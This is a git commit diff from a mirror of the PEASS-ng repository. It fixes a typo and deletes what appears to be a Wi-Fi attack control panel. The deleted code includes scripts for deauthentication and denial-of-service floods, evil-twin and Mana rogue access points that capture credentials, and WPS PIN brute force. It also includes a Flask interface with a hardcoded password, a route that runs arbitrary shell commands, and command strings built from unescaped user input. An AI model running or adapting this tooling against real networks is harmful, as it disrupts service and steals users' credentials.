1
mirror of https://github.com/carlospolop/PEASS-ng synced 2025-02-21 10:30:58 +01:00
This commit is contained in:
carlospolop 2020-02-24 00:07:53 +00:00
commit 324a696877
24 changed files with 1 additions and 1438 deletions

@ -495,7 +495,7 @@ echo ""
printf $Y"ADVISORY: "$B"$ADVISORY\n"$NC
echo ""
printf $B"Linux Privesc Checklist: "$Y"https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist\n"$NC
echo " LEYEND:" | sed "s,LEYEND,${C}[1;4m&${C}[0m,"
echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m,"
echo " RED/YELLOW: 99% a PE vector" | sed "s,RED/YELLOW,${C}[1;31;103m&${C}[0m,"
echo " RED: You must take a look at it" | sed "s,RED,${C}[1;31m&${C}[0m,"
echo " LightCyan: Users with console" | sed "s,LightCyan,${C}[1;96m&${C}[0m,"

@ -1,3 +0,0 @@
{
"python.pythonPath": "/usr/bin/python3"
}

@ -1,358 +0,0 @@
from flask import Flask, render_template, flash, redirect, url_for, request
app = Flask(__name__)
from flask_httpauth import HTTPBasicAuth
from flask_bootstrap import Bootstrap
bootstrap = Bootstrap(app)
from werkzeug.security import generate_password_hash, check_password_hash
#from app import app
from app.forms import DoSForm, ClientForm, CreateCertForm, HandshakeCapture, ExecForm, WPSCracking
from app.utils import *
import os, glob, signal
from subprocess import Popen, PIPE
from time import sleep
app.config['SECRET_KEY'] = os.urandom(32)
auth = HTTPBasicAuth()
users = {
"hacker": generate_password_hash("wwjuggler"),
}
@auth.verify_password
def verify_password(username, password):
if username in users:
return check_password_hash(users.get(username), password)
return False
@auth.login_required
@app.route('/change_wlan_mode/<string:wiface>', methods=['GET'])
def change_wlan_mode(wiface):
wlans = get_wlan_interfaces()
print(wiface)
if wiface in wlans:
if wlans[wiface] == "Managed":
#p = Popen(("iwconfig '"+wiface+"' mode monitor").split(" "), stdout=PIPE, stderr=PIPE)
p = Popen(("airmon-ng start '"+wiface).split(" "), stdout=PIPE, stderr=PIPE)
else:
#p = Popen(("iwconfig '"+wiface+"' mode managed").split(" "), stdout=PIPE, stderr=PIPE)
p = Popen(("airmon-ng stop '"+wiface).split(" "), stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
if stdout:
flash(stdout.decode("utf-8"))
if stderr:
flash("STDERR: "+stderr.decode("utf-8"))
return render_template('index.html', wlans=get_wlan_interfaces())
@app.route('/')
@app.route('/index')
@auth.login_required
def index():
wlans = get_wlan_interfaces()
return render_template('index.html', wlans=wlans)
@auth.login_required
@app.route('/scan_results')
def scan_results():
stations,clients = get_scan_results()
return render_template('scan_results.html', aps=stations, clients=clients)
@auth.login_required
@app.route('/dos', methods=['GET', 'POST'])
def dos():
station_macs, essids, clients_macs = get_macs_aps_clients()
form = DoSForm(request.form)
form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
form.essid1.choices = [(e, e) for e in essids]
form.bssid1.choices = [(b, b) for b in station_macs]
form.client1.choices = [(c, c) for c in clients_macs]
if form.validate_on_submit():
essid = form.essid2.data if form.essid2.data else ( form.essid1.data if form.essid1.data else "")
bssid = form.bssid2.data if form.bssid2.data else ( form.bssid1.data if form.bssid1.data else "")
client = form.client2.data if form.client2.data else ( form.client1.data if form.client1.data else "")
exec_msg = "Executing " + form.option.data + " in interface " + form.interface.data
cmd = scripts_path+"/DoS.sh -o "+ form.option.data + " -i " + form.interface.data
if essid:
exec_msg += ", against ESSID " + essid
cmd += " -e \"" + essid + "\""
if bssid:
exec_msg += ", against BSSID " + bssid
cmd += " -b " + bssid
if client:
exec_msg += ", against Client " + client
cmd += " -m " + client
if form.channel.data:
exec_msg += " in Channel " + str(form.channel.data)
cmd += " -c " + str(form.channel.data)
if form.fake_essids.data:
exec_msg += " anouncing fake ESSIDS ("+form.fake_essids.data+")"
cmd += " -f \"" + form.fake_essids.data + "\""
if form.time.data:
exec_msg += " during " + str(form.time.data) + "s"
cmd += " -t " + str(form.time.data)
else:
exec_msg += " indefinitely"
if form.stealth.data:
exec_msg += " and stealthy"
cmd += " -s"
flash(exec_msg)
outfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".out"
errfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".err"
my_execute(cmd, outfile, errfile, True)
return redirect(url_for('console'))
return render_template('form.html', formtype="DoS Attack", form=form)
@auth.login_required
@app.route('/client', methods=['GET', 'POST'])
def client():
station_macs, essids, clients_macs = get_macs_aps_clients()
form = ClientForm(request.form)
form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
form.essid_whitelist.choices = [(e, e) for e in essids]
form.essid_blacklist.choices = [(e, e) for e in essids]
form.mac_whitelist.choices = [(c, c) for c in clients_macs]
form.mac_blacklist.choices = [(c, c) for c in clients_macs]
if form.validate_on_submit():
essid = form.essid2.data if form.essid2.data else ( form.essid1.data if form.essid1.data else "")
exec_msg = "Executing " + form.option.data + " in interface " + form.interface.data + " using as authentication "+form.auth.data
cmd = scripts_path+"/Client.sh -o "+ form.option.data + " -i " + form.interface.data + " -a " + form.auth.data
if form.wpa_version.data:
exec_msg += "(" + form.wpa_version.data +")"
cmd += " -w " + form.wpa_version.data
if essid:
exec_msg += ", as ESSID " + essid
cmd += " -e " + essid
if form.bssid.data:
exec_msg += ", as BSSID " + form.bssid.data
cmd += " -e " + essid
if form.channel.data:
exec_msg += " in Channel " + str(form.channel.data)
cmd += " -c " + str(form.channel.data)
if form.loud.data:
exec_msg += " (Loud mode)"
cmd += " -l"
if form.known_beacons.data:
exec_msg += " - Known Beacons declared"
cmd += " -k " + ",".join(form.known_beacons.data)
if form.mac_whitelist.data:
exec_msg += " - Mac Whitelist declared"
cmd += " -p " + ",".join(form.mac_whitelist.data)
if form.mac_blacklist.data:
exec_msg += " - Mac Blacklist declared"
cmd += " -v " + ",".join(form.mac_blacklist.data)
if form.essid_whitelist.data:
exec_msg += " - ESSID Whitelist declared"
cmd += " -n " + ",".join(form.essid_whitelist.data)
if form.essid_blacklist.data:
exec_msg += " - ESSID Blacklist declared"
cmd += " -m " + ",".join(form.essid_blacklist.data)
flash(exec_msg)
outfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".out"
errfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".err"
my_execute(cmd.split(" "), outfile, errfile)
return redirect(url_for('console'))
return render_template('form.html', formtype="Client Attack", form=form)
@auth.login_required
@app.route('/create_cert', methods=['GET', 'POST'])
def create_cert():
form = CreateCertForm(request.form)
if form.validate_on_submit():
exec_msg = "Creating certificate with CC: "+form.cc.data+", State:"+form.state.data+", City: "+form.city.data+", Organization: "+form.organization.data+", Department: "+form.department.data+", Email"+form.email.data+", CN:"+form.cn.data
cmd = scripts_path+"/Create_cert.sh '{}' '{}' '{}' '{}' '{}' '{}' '{}'".format(form.cc.data, form.state.data, form.city.data, form.organization.data, form.department.data, form.email.data, form.cn.data)
flash(exec_msg)
outfile = current_store_path+"/create_cert"+str(count_ps)+".out"
errfile = current_store_path+"/create_cert"+str(count_ps)+".err"
my_execute(cmd, outfile, errfile, True)
return redirect(url_for('console'))
return render_template('form.html', formtype="Create EAP Certificate", form=form)
@auth.login_required
@app.route('/wps_cracking', methods=['GET', 'POST'])
def wps_cracking():
station_macs, essids, clients_macs = get_macs_aps_clients()
form = WPSCracking(request.form)
form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
form.bssid.choices = [(b, b) for b in station_macs]
if form.validate_on_submit():
exec_msg = "WPS cracking with option "+form.option.data+" against BSSID "+form.bssid.data+" in channel "+str(form.channel.data)
cmd = scripts_path+"/WPS.sh -t {} -i '{}' -b '{}' -c '{}' -o '{}'".format(form.tool.data, form.interface.data, form.bssid.data, form.channel.data, form.option.data)
if form.ignore_locks.data:
exec_msg += "(ignore LOCK)"
cmd += " -l"
if form.pin.data:
exec_msg += ", PIN: "+str(form.pin.data)
cmd += " -p "+str(form.pin.data)
if form.option.data == "nullpin":
cmd.replace("bully", "reaver")
flash(exec_msg)
outfile = current_store_path+"/"+form.interface.data+"-"+str(count_ps)+".out"
errfile = current_store_path+"/"+form.interface.data+"-"+str(count_ps)+".err"
my_execute(cmd, outfile, errfile, True)
return redirect(url_for('console'))
return render_template('form.html', formtype="WPS Cracking", form=form)
@auth.login_required
@app.route('/capture_handshake', methods=['GET', 'POST'])
def capture_handshake():
station_macs, essids, clients_macs = get_macs_aps_clients()
form = HandshakeCapture(request.form)
form.interface.choices = [(wlan, "{} ({})".format(wlan, mode)) for wlan,mode in get_wlan_interfaces().items()]
form.bssid.choices = [(b, b) for b in station_macs]
if form.validate_on_submit():
exec_msg = "Capturing handshakes using interface " + form.interface.data + " of bssid " + form.bssid.data + " in channel "+str(form.channel.data)
cmd = scripts_path+"/Capture_handshakes.sh " + form.interface.data + " " +str(form.channel.data) + " " + form.bssid.data + " " + current_store_path + "/psk"
flash(exec_msg)
outfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".out"
errfile = current_store_path+"/"+form.interface.data+"-"+form.option.data+str(count_ps)+".err"
my_execute(cmd.split(" "), outfile, errfile)
return redirect(url_for('console'))
return render_template('form.html', formtype="Capture Handshakes", form=form)
@auth.login_required
@app.route('/execute', methods=['GET', 'POST'])
def execute():
form = ExecForm()
if form.validate_on_submit():
exec_msg = "Going to execute: " + form.cmd.data
flash(exec_msg)
outfile = current_store_path+"/execute"+str(count_ps)+".out"
errfile = current_store_path+"/execute"+str(count_ps)+".err"
my_execute(form.cmd.data , outfile, errfile, True)
sleep(1)#So when you gets to console the command is probably executed already
return redirect(url_for('console'))
return render_template('form.html', formtype="Execute", form=form)
@auth.login_required
@app.route('/console')
def console():
procs = get_procs()
return render_template('console.html', procs=procs)
@auth.login_required
@app.route('/kill/<string:file_name>', methods=['GET'])
def kill(file_name):
global executing_procs
procs = get_procs()
if ".err" in file_name:
file_name=file_name.replace(".err",".out")
if file_name in executing_procs and any([p["terminated"] == "Running" for p in procs if p["name"] == file_name]): #Check that the process is still running
pid = executing_procs[file_name].pid
try:
if not "mana" in file_name and not "evil_twin" in file_name:
os.killpg(pid, signal.SIGTERM)
else:
executing_procs[file_name].communicate(input=b"\n")
sleep(4)
flash("Process terminated ("+file_name.split(".")[0]+") with PID "+str(pid)+".")
except Exception as e:
print(e)
#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".out"):
# os.remove(current_store_path+"/"+file_name.split(".")[0]+".out")
#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".err"):
# os.remove(current_store_path+"/"+file_name.split(".")[0]+".err")
return redirect(url_for('console'))
@auth.login_required
@app.route('/killall', methods=['GET'])
def killall():
global executing_procs
procs = get_procs()
for file_name in executing_procs:
if any([p["terminated"] == "Running" for p in procs if p["name"] == file_name]): #Check that the process is still running
pid = executing_procs[file_name].pid
try:
if not "mana" in file_name and not "evil_twin" in file_name:
os.killpg(pid, signal.SIGTERM)
else:
executing_procs[file_name].communicate(input=b"\n")
sleep(4)
flash("Process terminated ("+file_name.split(".")[0]+") with PID "+str(pid)+".")
except:
pass
#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".out"):
# os.remove(current_store_path+"/"+file_name.split(".")[0]+".out")
#if os.path.exists(current_store_path+"/"+file_name.split(".")[0]+".err"):
# os.remove(current_store_path+"/"+file_name.split(".")[0]+".err")
executing_procs = {}
return redirect(url_for('console'))
@auth.login_required
@app.route('/restart_airodump', methods=['POST'])
def restart_airodump():
restart_airo()
return redirect(url_for('index'))
@auth.login_required
@app.route('/reboot', methods=['POST'])
def reboot():
os.system("reboot")
##################################################
################ INITIAL ACTIONS #################
##################################################
#clean_exec_procs_dir() #Start cleaning other executions
if not os.path.exists(store_path): #Create main dir if it doesn't exit (1st run)
os.mkdir(store_path)
if not os.path.exists(current_store_path): #Create main dir if it doesn't exit (1st run)
os.mkdir(current_store_path)
if not os.path.exists(store_airodump): #Create main dir if it doesn't exit (1st run)
os.mkdir(store_airodump)
sleep(0.5)
restart_airo() #"Restart" any airodump to capture packets

@ -1,79 +0,0 @@
from flask_wtf import FlaskForm
from wtforms import StringField, SelectField, IntegerField, BooleanField, SubmitField, PasswordField, TextAreaField, validators, SelectMultipleField
from wtforms.validators import DataRequired
class DoSForm(FlaskForm):
option = SelectField(u'DoS Attacks', choices=[('deauth_mdk4', 'MDK4 Deauth'), ('deauth_aireplay', 'Aireplay Deauth'), ('WIDS_confusion', 'WIDS Confusion'), ('fake_aps', 'Fake APs'), ('reinject_data', 'DoS AP reinjecting data'), ('EAPOL_DoS', 'EAPOL_DoS'), ('TKIP_DoS', 'TKIP_DoS')], validators=[DataRequired()])
interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
essid1 = SelectField(u'ESSID1', choices=[], validators=(validators.Optional(),))
essid2 = StringField(u'ESSID2', validators=(validators.Optional(),))
bssid1 = SelectField(u'BSSID1', choices=[], validators=(validators.Optional(),))
bssid2 = StringField(u'BSSID2', [
validators.Optional(),
validators.Regexp(r'^[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}$', message="Username must contain only letters numbers or underscore"),
validators.Length(min=17, max=17, message="BSSID must be 17 chars length: 45:D2:28:33:B7:2D")
])
client1 = SelectField(u'Client1', choices=[], validators=(validators.Optional(),))
client2 = StringField(u'Client2', [
validators.Optional(),
validators.Regexp(r'^[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}$', message="Username must contain only letters numbers or underscore"),
validators.Length(min=17, max=17, message="Client MAC must be 17 chars length: 45:D2:28:33:B7:2D")
])
fake_essids = StringField(u'Fake essids', validators=(validators.Optional(),))
time = IntegerField(u'Time', validators=(validators.Optional(),))
channel = IntegerField(u'Channel', validators=(validators.Optional(),))
stealth = BooleanField(u'Stealth')
submit = SubmitField(u'Attack')
class ClientForm(FlaskForm):
option = SelectField(u'Client Attack', choices=[('evil_twin', 'Evil Twin'), ('mana', 'Mana')], validators=[DataRequired()])
interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
auth = SelectField(u'Auth method', choices=[("open","open"),("wpa-psk","wpa-psk"),("wpa-eap","wpa-eap"),("owe","owe"),("owe-transition","owe-transition"),("owe-psk","owe-psk")], validators=[DataRequired()])
essid1 = SelectField(u'ESSID1', choices=[], validators=(validators.Optional(),))
essid2 = StringField(u'ESSID2', validators=(validators.Optional(),))
bssid = StringField(u'BSSID', [
validators.Optional(),
validators.Regexp(r'^[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}:[\da-fA-F]{2}$', message="Username must contain only letters numbers or underscore"),
validators.Length(min=17, max=17, message="BSSID must be 17 chars length: 45:D2:28:33:B7:2D")
], default="74:D0:2B:90:56:F2")
wpa_version = SelectField(u'WPA version', choices=[("2","2"),("1","1")], validators=(validators.Optional(),))
channel = IntegerField(u'Channel', validators=(validators.Optional(),))
loud = BooleanField(u'Loud')
known_beacons = StringField(u'Known Beacons', validators=(validators.Optional(),))
mac_whitelist = SelectMultipleField(u'Mac Whitelist', choices=[], validators=(validators.Optional(),))
mac_blacklist = SelectMultipleField(u'Mac Blacklist', choices=[], validators=(validators.Optional(),))
essid_whitelist = SelectMultipleField(u'ESSID Whitelist', choices=[], validators=(validators.Optional(),))
essid_blacklist = SelectMultipleField(u'ESSID Blacklist', choices=[], validators=(validators.Optional(),))
submit = SubmitField(u'Attack')
class CreateCertForm(FlaskForm):
cc = StringField(u'Please enter two letter country code for certs (i.e. US, FR)', default="US", validators=[DataRequired()])
state = StringField(u'Please enter state or province for certs (i.e. Ontario, New Jersey)', default="California", validators=[DataRequired()])
city = StringField(u'Please enter locale for certs (i.e. London, Hong Kong)', default="Los Angeles", validators=[DataRequired()])
organization = StringField(u'Please enter organization for certs (i.e. Evil Corp)', default="Microsoft", validators=[DataRequired()])
department = StringField(u'Please enter org unit for certs (i.e. Hooman Resource Says)', default="Human Resources", validators=[DataRequired()])
email = StringField(u'Please enter email for certs (i.e. cyberz@h4x0r.lulz)', default="humanresources@microsoft.com", validators=[DataRequired()])
cn = StringField(u'Please enter common name (CN) for certs.', default="microsoft.com", validators=[DataRequired()])
submit = SubmitField(u'Create')
class HandshakeCapture(FlaskForm):
option = SelectField(u'', choices=[("airodump","Airodump-ng")], validators=[DataRequired()])
interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
bssid = SelectField(u'BSSID', choices=[], validators=(validators.Optional(),))
channel = IntegerField(u'Channel', validators=[DataRequired()])
submit = SubmitField(u'Capture')
class ExecForm(FlaskForm):
cmd = StringField(u'Command line to execute', default="whoami", validators=[DataRequired()])
submit = SubmitField(u'Execute')
class WPSCracking(FlaskForm):
option = SelectField(u'Option', choices=[("custompin", "Custom PIN"), ("nullpin", "Null PIN"), ("pixiedust", "Pixiedust"), ("bruteforce_wps", "Brute-Force")], validators=[DataRequired()])
tool = SelectField(u'Tool', choices=[("reaver", "reaver"), ("bully", "bully")], validators=[DataRequired()])
interface = SelectField(u'Interface', choices=[], validators=[DataRequired()])
bssid = SelectField(u'BSSID', choices=[], validators=(validators.Optional(),))
channel = IntegerField(u'Channel', validators=[DataRequired()])
pin = IntegerField(u'Pin', validators=(validators.Optional(),))
ignore_locks = BooleanField(u'Ignore Locks', default=True)
submit = SubmitField(u'Crack')

@ -1,5 +0,0 @@
#!/bin/bash
echo "Executing: airodump-ng $1 -c \"$2\" --bssid \"$3\" -w \"$4\""
airodump-ng "$1" -c "$2" --bssid "$3" -w "$4" --output-format pcap

@ -1,107 +0,0 @@
#!/bin/bash
INTERFACE=""
ESSID=""
BSSID=""
AUTH=""
WPA_VERSION=""
KNOWN_BEACONS=""
MAC_WHITELIST=""
MAC_BLACKLIST=""
OPTION=""
LOUD=""
CHANNEL=""
while getopts "i:e:b:a:w:k:p:v:o:c:l" opt; do
case "$opt" in
i) INTERFACE=$OPTARG;;
e) ESSID=$OPTARG;;
b) BSSID=$OPTARG;;
a) AUTH=$OPTARG;;
w) WPA_VERSION=$OPTARG;;
k) KNOWN_BEACONS=$OPTARG;;
p) MAC_WHITELIST=$OPTARG;;
v) MAC_BLACKLIST=$OPTARG;;
o) OPTION=$OPTARG;;
c) CHANNEL=$OPTARG;;
l) LOUD="1";; #Used to no broadcast deauthentication packets, only useful with mdk4
esac
done
evil_twin(){
# REQUREMENTS: INTERFACE, ESSID and AUTH
CMD="eaphammer -i $INTERFACE --essid $ESSID --auth $AUTH"
if [ "$AUTH" = "open" ]; then
CMD="$CMD --captive-portal"
elif [ "$AUTH" = "wpa-psk" ] || [ "$AUTH" = "wpa-eap" ]; then
if [ "$WPA_VERSION" ]; then
CMD="$CMD --wpa-version $WPA_VERSION --creds"
fi
else
CMD="$CMD --creds"
fi
if [ "$CHANNEL" ]; then
CMD="$CMD --channel $CHANNEL"
fi
if [ "$MAC_WHITELIST" ]; then
TEMPFILEWHITE="/tmp/white$RANDOM"
echo "$MAC_WHITELIST" | sed "s/,/\n/g" > $TEMPFILEWHITE
CMD="$CMD ---mac-whitelist $TEMPFILEWHITE"
fi
if [ "$MAC_BLACKLIST" ]; then
TEMPFILEBLACK="/tmp/black$RANDOM"
echo "$TEMPFILEBLACK" | sed "s/,/\n/g" > $TEMPFILEBLACK
CMD="$CMD ---mac-blacklist $TEMPFILEWHITE"
fi
echo "Going to execute $CMD"
$CMD
}
mana(){
# REQUREMENTS: INTERFACE, ESSID and AUTH
CMD="eaphammer -i $INTERFACE --auth $AUTH --cloaking full --mana"
if [ "$AUTH" = "open" ]; then
CMD="$CMD --captive-portal"
else
CMD="$CMD --creds"
fi
if [ "$LOUD" ]; then
CMD="$CMD --loud"
fi
if [ "$MAC_WHITELIST" ]; then
TEMPFILEWHITE="/tmp/white$RANDOM"
echo "$MAC_WHITELIST" | sed "s/,/\n/g" > $TEMPFILEWHITE
CMD="$CMD ---mac-whitelist $TEMPFILEWHITE"
fi
if [ "$MAC_BLACKLIST" ]; then
TEMPFILEBLACK="/tmp/black$RANDOM"
echo "$TEMPFILEBLACK" | sed "s/,/\n/g" > $TEMPFILEBLACK
CMD="$CMD ---mac-blacklist $TEMPFILEWHITE"
fi
if [ "$KNOWN_BEACONS" ]; then
TEMPFILE="/tmp/beacons$RANDOM"
echo "$KNOWN_BEACONS" | sed "s/,/\n/g" > $TEMPFILE
CMD="$CMD --known-beacons --known-ssids-file $TEMPFILE"
fi
echo "Going to execute $CMD"
$CMD
}
if [ "$OPTION" == "evil_twin" ]; then
evil_twin
elif [ "$OPTION" == "mana" ]; then
mana
fi

@ -1,5 +0,0 @@
#!/bin/bash
echo "Executing: echo -e \"$1\n$2\n$3\n$4\n$5\n$6\n$7\" | eaphammer --cert-wizard interactive"
echo -e "$1\n$2\n$3\n$4\n$5\n$6\n$7" | eaphammer --cert-wizard interactive

@ -1,209 +0,0 @@
#!/bin/bash
INTERFACE=""
ESSID=""
BSSID=""
MAC_CLIENT=""
TIME=""
OPTION=""
CHANNEL=""
STEALTH=""
FAKE_ESSIDS=""
while getopts "i:e:b:m:c:t:o:f:s" opt; do
case "$opt" in
i) INTERFACE=$OPTARG;;
e) ESSID=$OPTARG;;
b) BSSID=$OPTARG;;
m) MAC_CLIENT=$OPTARG;;
c) CHANNEL=$OPTARG;;
t) TIME=$OPTARG;;
o) OPTION=$OPTARG;;
f) FAKE_ESSIDS=$OPTARG;;
s) STEALTH="1";; #Used to no broadcast deauthentication packets, only useful with mdk4
esac
done
deauth_aireplay(){
# REQUREMENTS: INTERFACE and (ESSID or BSSID)
# Working mode:
# Cannot perform hole automatic deauth of everything found
# If only ESSID is given, broadcast desauth will be launch to the found BSSID using the given ESSID
# If only the BSSID is given, broadcast desauth is launched
# In this case Stealth flag doesn't do nothing as aireplay do not support it
CMD="aireplay-ng -0 0"
if [ "$ESSID" ]; then
CMD="$CMD -e $ESSID"
fi
if [ "$BSSID" ]; then
CMD="$CMD -a $BSSID"
fi
if [ "$MAC_CLIENT" ]; then
CMD="$CMD -c $MAC_CLIENT"
fi
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
CMD="$CMD $INTERFACE"
echo Going to execute $CMD
$CMD
}
deauth_mdk4(){
# REQUREMENTS: INTERFACE
# Working mode:
# Can perform hole automatic deauth of everything found
# If Stealth is used, no broadcast packet is sent
CMD="mdk4 $INTERFACE d"
if [ "$ESSID" ]; then
CMD="$CMD -E $ESSID"
fi
if [ "$BSSID" ]; then
CMD="$CMD -B $BSSID"
fi
if [ "$MAC_CLIENT" ]; then
TEMPFILE="/tmp/victim$RANDOM"
echo "$MAC_CLIENT" > $TEMPFILE
CMD="$CMD -b $TEMPFILE"
fi
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$CHANNEL" ]; then
CMD="$CMD -c $CHANNEL"
fi
if [ "$STEALTH" ]; then
CMD="$CMD -x"
fi
echo "Going to execute $CMD"
$CMD
}
fake_aps(){
# REQUREMENTS: INTERFACE
# Working mode:
# Will send fake beacons of APs, if stealth mode is used, nonprintable chars and long names will be sent.
CMD="mdk4 $INTERFACE b -w nwta -m"
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$CHANNEL" ]; then
CMD="$CMD -h -c $CHANNEL"
fi
if [ "$FAKE_ESSIDS" ]; then
TEMPFILE="/tmp/essids$RANDOM"
echo "$FAKE_ESSIDS" | sed "s/,/\n/g" > $TEMPFILE
CMD="$CMD -f $TEMPFILE"
else
if ! [ "$STEALTH" ]; then
CMD="$CMD -a"
fi
fi
echo "Going to execute $CMD"
$CMD
}
reinject_data(){
# REQUREMENTS: INTERFACE and BSSID
# Working mode: (Stealth and not stealth could be combined)
# If stealth, capture and repeat packets from authenticated clients, else send random data from random clients.
CMD="mdk4 $INTERFACE a -m"
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$STEALTH" ]; then
CMD="$CMD -i $BSSID"
else
CMD="$CMD -a $BSSID"
fi
echo "Going to execute $CMD"
$CMD
}
TKIP_DoS(){
# REQUREMENTS: INTERFACE and a WPA/TKIP AP
# Working mode: (Stealth and not stealth could be combined)
# If stealth, use intelligent replay
CMD="mdk4 $INTERFACE m"
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$BSSID" ]; then
CMD="$CMD -t $BSSID"
fi
if [ "$STEALTH" ]; then
CMD="$CMD -j"
fi
echo "Going to execute $CMD"
$CMD
}
EAPOL_DoS(){
# REQUREMENTS: INTERFACE and a EAP AP
# Working mode: (Stealth and not stealth could be combined)
# If stealth, use Logoff messages to kick clients
CMD="mdk4 $INTERFACE e"
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$BSSID" ]; then
CMD="$CMD -t $BSSID"
fi
if [ "$STEALTH" ]; then
CMD="$CMD -l"
fi
echo "Going to execute $CMD"
$CMD
}
WIDS_confusion(){
# REQUREMENTS: INTERFACE and BSSID/ESSID
# Working mode: (Stealth and not stealth could be combined)
# If no stealth, activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
CMD="mdk4 $INTERFACE w"
if [ "$TIME" ]; then
CMD="timeout $TIME $CMD"
fi
if [ "$BSSID" ]; then
CMD="$CMD -e $BSSID"
elif [ "$ESSID" ]; then
CMD="$CMD -e $ESSID"
fi
if ! [ "$STEALTH" ]; then
CMD="$CMD -z"
fi
echo "Going to execute $CMD"
$CMD
}
if [ "$OPTION" == "deauth_aireplay" ]; then
deauth_aireplay
elif [ "$OPTION" == "deauth_mdk4" ]; then
deauth_mdk4
elif [ "$OPTION" == "fake_aps" ]; then
fake_aps
elif [ "$OPTION" == "reinject_data" ]; then
reinject_data
elif [ "$OPTION" == "TKIP_DoS" ]; then
TKIP_DoS
elif [ "$OPTION" == "EAPOL_DoS" ]; then
EAPOL_DoS
elif [ "$OPTION" == "WIDS_confusion" ]; then
WIDS_confusion
fi

@ -1,70 +0,0 @@
#!/bin/bash
INTERFACE=""
OPTION=""
TOOL=""
BSSID=""
CHANNEL=""
PIN=""
IGNORE_LOCKS="1"
while getopts "i:o:t:b:c:p:l" opt; do
case "$opt" in
i) INTERFACE=$OPTARG;;
o) OPTION=$OPTARG;;
t) TOOL=$OPTARG;;
b) BSSID=$OPTARG;;
c) CHANNEL=$OPTARG;;
p) PIN=$OPTARG;;
l) IGNORE_LOCKS="";;
esac
done
wps_force(){
# REQUREMENTS: INTERFACE, ESSID and AUTH
if [ $TOOL = "reaver" ]; then
CMD="reaver -i $INTERFACE -b $BSSID -c $CHANNEL"
case $OPTION in
"custompin")
CMD="$CMD -f -N -g 1 -d 2 -vv -p '$PIN'"
if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
;;
"nullpin")
CMD="$CMD -f -N -g 1 -d 2 -vv -p ''"
if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
;;
"pixiedust")
CMD="$CMD -K 1 -Z -N -vv"
;;
"bruteforce")
CMD="$CMD -f -N -vv"
if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L -d 2"; fi
;;
esac
elif [ $TOOL = "bully" ]; then
CMD="bully $INTERFACE -b $BSSID -c $CHANNEL"
case $OPTION in
"custompin")
CMD="$CMD -F -B -v 3 -p '$PIN'"
if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
;;
"pixiedust")
CMD="$CMD -d -v 3"
;;
"bruteforce_wps")
CMD="$CMD -S -F -B -v 3"
if [ "$IGNORE_LOCKS" ]; then CMD="$CMD -L"; fi
;;
esac
fi
echo "Going to execute: echo \"n\" | $CMD"
echo "n" | $CMD
}
wps_force

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

@ -1,262 +0,0 @@
file:///root/projects/wwjuggler/app/static/form_options.js {"mtime":1578310037779,"ctime":1578075190140,"size":9552,"etag":"34ebpirra9t4","orphaned":false}
$("#option").on("change", function(){
hide_fields()
});
function hide_fields() {
$('#option_msg').html(options_msgs[$("#option").val()]);
switch($("#option").val()) {
case "deauth_aireplay":
show_essid()
show_bssid()
show_client()
hide_fake_essids()
hide_stealth()
hide_channel()
break;
case "deauth_mdk4":
show_essid()
show_bssid()
show_client()
show_stealth()
show_channel()
hide_fake_essids()
break;
case "WIDS_confusion":
show_essid()
show_bssid()
show_stealth()
hide_client()
hide_fake_essids()
hide_channel()
break;
case "fake_aps":
show_channel()
show_stealth()
show_fake_essids()
hide_bssid()
hide_client()
hide_essid()
break;
case "reinject_data":
show_bssid()
show_stealth()
hide_essid()
hide_channel()
hide_client()
hide_fake_essids()
break;
case "EAPOL_DoS":
show_bssid()
show_stealth()
hide_essid()
hide_channel()
hide_client()
hide_fake_essids()
break;
case "TKIP_DoS":
show_bssid()
show_stealth()
hide_essid()
hide_channel()
hide_client()
hide_fake_essids()
break;
case "evil_twin":
hide_known_beacons()
hide_mac_whitelist()
hide_mac_blacklist()
hide_essid_whitelist()
hide_essid_blacklist()
hide_loud()
show_essid()
show_bssid()
show_channel()
break;
case "mana":
show_known_beacons()
show_mac_whitelist()
show_mac_blacklist()
show_essid_whitelist()
show_essid_blacklist()
show_loud()
hide_essid()
hide_bssid()
break;
default:
show_essid()
show_bssid()
show_client()
show_fake_essids()
show_stealth()
show_channel()
show_known_beacons()
show_mac_whitelist()
show_mac_blacklist()
show_essid_whitelist()
show_essid_blacklist()
show_loud()
break;
}
}
